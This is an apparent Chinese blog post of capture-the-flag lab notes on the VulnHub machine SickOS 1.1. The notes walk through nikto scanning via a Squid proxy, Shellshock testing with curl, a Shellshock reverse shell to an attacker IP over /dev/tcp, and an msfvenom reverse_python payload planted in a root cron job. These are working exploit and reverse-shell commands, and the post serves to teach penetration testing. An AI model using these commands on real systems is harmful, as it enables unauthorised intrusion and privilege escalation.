靶机精讲之SickOS-方法2

已于 2023-08-05 23:11:05 修改
阅读量459 收藏
点赞数
分类专栏: 靶机精讲 文章标签: 服务器 linux 运维
于 2023-04-08 20:07:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63285023/article/details/130020320
版权

主机发现

 用代理扫描 -useproxy

nikto扫描

-h ip

sudo nikto -h 192.168.10.191 -useproxy http://192.168.10.191/3128

 

 shellshock漏洞原理

 验证有没有shellshock漏洞

查找shellshock漏洞利用方法

用curl挂代理

sudo curl -v --proxy http://192.168.10.191:3128 http://192.168.10.191/cgi-bin/status -H "Referer:(){ test:}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id;exit"

shellshock漏洞验证

 

 存在

获取初始系统shell

msfvenom 生成后门

知识点

Kali中的 msfvenom 取代了msfpayload和msfencode,常用于生成后门木马

msfpayload是MSF攻击荷载生成器,用于生成shellcode和可执行代码。

msfencode是MSF编码器。-p 指定需要使用的payload(攻击荷载)。

-f 指定输出格式

Msf中创建木马时使用的LHOST表示的是攻击者地址;LPOST表示的是攻击者端口;RHOST表示的是被攻击地址;RPOST表示的是被攻击端口

生成payload

 建立监听

 执行命令(修改路径)

知识点

curl是一个非常实用的、用来与服务器之间传输数据的工具;支持的协议包括 (DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SCP, SFTP, SMTP, SMTPS, TELNET and TFTP),curl设计为无用户交互下完成工作;curl提供了一大堆非常有用的功能,包括代理访问、用户认证、ftp上传下载、HTTP POST、SSL连接、cookie支持、断点续传...。

 把上面指令复制

无反应,路径应该要完整

重新开始监听

 加上完整路径sh前加上/bin/

 每个空格字母都要主要

sudo curl -v --proxy http://192.168.10.191:3128 http://192.168.10.191/cgi-bin/status -H "Referer:() { test;}; 0<&108-;exec 108<>/dev/tcp/192.168.10.153/443;/bin/sh <&108 >&108 2>&108"

反弹成功,半个shell

 

 dpkg -l 查看装的软件

运行python,获得更好的shell

 看权限

 返回翻文件

 

 

 翻网站

 看目录

 

 执行python

 执行ls liah cr*(检索关键字)

Cron自动任务提权

cat crontab

****root,定时命令

可以把命令植入该路径

 生成payload

sudo msfvenom -p cmd/unix/reverse_python lhost=192.168.10.153 lport=444 -f raw

rooted

 把python -c后的生成码粘贴不带“

 

 输入o,然后粘贴payload

 (靶机环境崩坏,结束做笔记)

 

 回弹拿shell成功

 

996式草包
关注
专栏目录
vulnhub靶机实战-My-cmsms靶机
09-29
在本例中,我们使用nmap命令来扫描靶机的开放端口,得到其开放的服务类型和版本信息,例如ssh服务的版本为OpenSSH 7.9p1 Debian 10+deb10u2,http服务的版本为Apache httpd 2.4.38,mysql服务的版本为MySQL 8.0.19等...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
红队打靶:SickOS1.1详细打靶思路之shellshock漏洞利用(vulnhub)
Bossfrank的博客
06-08 836
本文详述了vulnhub靶机sickOS1.1的打靶过程。本文利用了bash漏洞shellshock获取初始立足点,并使用定时任务进行提权。不同于单纯的writeup,本文更注重打靶每一步的思路用意。本文涉及的知识点包括nikto扫描、shellshock漏洞利用、msfvenom生成payload、定时任务提权等。采用squid代理分析+web渗透cms后台获取root权限的思路详见我的上一篇博客。
SickOs1.1靶机
2301_80203701的博客
12-11 276
但是又没开放3306端口利用不了,万一别的用户也可以用这个密码登录呢,那就看看所有的用户。打开了,随便点点看。刚开始无意的输入一个弱口令就进去,账号:admin 密码:admin。也没扫出来什么有用的端口,但是该进行的扫描是必须要进行的,万一哪次就是突破口呢。可以看到开放了 22,3128,8080端口。爆出来个Dos,一般的渗透测试中不用这种损人的漏洞。这个可以执行,php代码,那就开始反弹shell吧,有个wolfcms,记着,接着访问login页面。有点乱,看看有什么可以执行的命令打开这个文件。
「红队笔记」靶机精讲SickOS1.1 - 穿越Squid代理的CMS渗透
m0_73612768的博客
11-29 1368
本文是作者在观看B站《红队笔记》后做的一些笔记以及相关知识的补充。靶机精讲SickOS1.1,vulnhub靶机,需要配置代理,穿越Squid实现对CMS渗透,完整的攻击链,对基本功要求比较高,不难,但也需要全局观和细节操作。能顺利完成本机渗透,也证明你在不断进步。此为方法一,本机还有全然不同的第二种打法。
靶机精讲SickOS
m0_63285023的博客
04-06 609
靶机精讲SickOS
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
ThinkServer SR658H V2服务器BMC做raid与装系统
Lzcsfg的博客
11-13 448
要求: 1. 将两个894G的磁盘做成raid1 2. 将两块14902G的磁盘各自做成raid0
Linux将二进制软件包编译成rpm软件包教程详解
广阔天地,大有作为
11-12 753
通过以上步骤,你可以将二进制软件包编译成RPM软件包,并在Linux系统中进行安装和管理。这个过程虽然涉及一些复杂的配置,但通过.spec文件的详细定义,你可以精确控制软件包的构建和安装过程。希望这篇教程能帮助你更好地理解和使用RPM包管理工具。
服务器】本地安装X11 服务器-Windows
WW、forever的博客
11-12 1273
服务器】本地安装X11 服务器-Windows
三周精通FastAPI:42 手动运行服务器 - Uvicorn & Gunicorn with Uvicorn
skywalk8163的专栏
11-14 618
使用可以直接使用fastapi run命令来启动如执行启动后显示:这将适用于大多数情况。😎例如,您可以使用该命令在容器、服务器等中启动FastAPI应用程序。
服务器集群的作用有什么?
wanhengwangluo的博客
11-12 743
服务器集群通常是指多个服务器集中起来一起进行同一种服务,在客户端看来只有一个服务器服务器集群能够利用多个计算机做备份工作,同时进行并行计算来获得更高的计算速度,即使其中的某个机器出现问题,整个系统还是可以正常运行的。服务器集群可以将传入的用户请求分发到不同的服务器上进行处理,以此来达到负载均衡的效果,可以充分利用每台服务器的资源,提高了整个系统的性能和响应速度;同时当服务器出现故障时,扔人可以保证服务的正常运行,避免可单点故障,保证业务的持续运行。接下来就来了解一下服务器集群的作用是什么吧!
服务器和物理服务器的区别有哪些?
wanhengwangluo的博客
11-13 445
服务器和物理服务器相比较来说,在灵活性上有着一定的优势,可以根据企业的自身需求来弹性的配置空间和流量,并且企业不需要承担昂贵的运维成本,但是云服务器中数据等存储上并不是绝对私有的,而是存放在公共区域内分割好的空间中。云服务器服务器集群虚拟为多个性能可配的虚拟主机,云服务器的基础依旧是需要物理服务器的,要用海量的物理服务器集群进行建构,以此来形成云端虚拟资源池,根据企业的自身需求,来从资源池中进行资源分配。
IDC机房服务器托管的费用组成
yilinwangluo的博客
11-12 537
青蛙云IDC提示:在选择IDC机房时,建议详细了解其定价结构和各项费用明细,以便做出符合预算和业务需求的合适选择,同时,记得比较不同机房的报价和服务质量,以找到性价比高的解决方案。- 如果你需要额外的IP地址,IDC机房可能会为此收取额外的费用。- 根据你的服务器功率和预计的电力消耗,IDC机房可能会收取电力费用。- 在某些情况下,IDC机房可能会收取初始的设置和安装费用,包括服务器上架、网络配置、操作系统安装等。- 如果你选择由IDC机房提供全面的服务器管理和维护服务,这将产生额外的费用。
坚果云·无法连接服务器(无法同步)
最新发布
qq_31225201的博客
11-15 138
(更改DNS配置:控制面板→网络和 Internet→网络和共享中心→更改适配器设置→选择某个使用的网络(双击)→Internet 协议版本4(TCP/IPv4)→属性→自动获得 IP 地址)(通常坚果云官网可以正常打开,则可以正常同步)换用移动热点、关闭有线网络。另外,更改DNS配置为。
连接实验室服务器并创建虚拟环境,从本地上传文件到linux服务器,使用requirement.txt安装环境需要的依赖的方法及下载缓慢的解决方法(Linux)
aha_xigua的博客
11-12 420
现在你已经成功创建并激活了一个新的conda环境。如果返回了版本信息,说明conda已经安装。如果没有安装,你需要先安装conda。创建一个新的conda环境。在你的个人计算机上打开终端(命令行界面)。输入密码后,你将成功连接到实验室服务器。三、利用conda创建环境。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值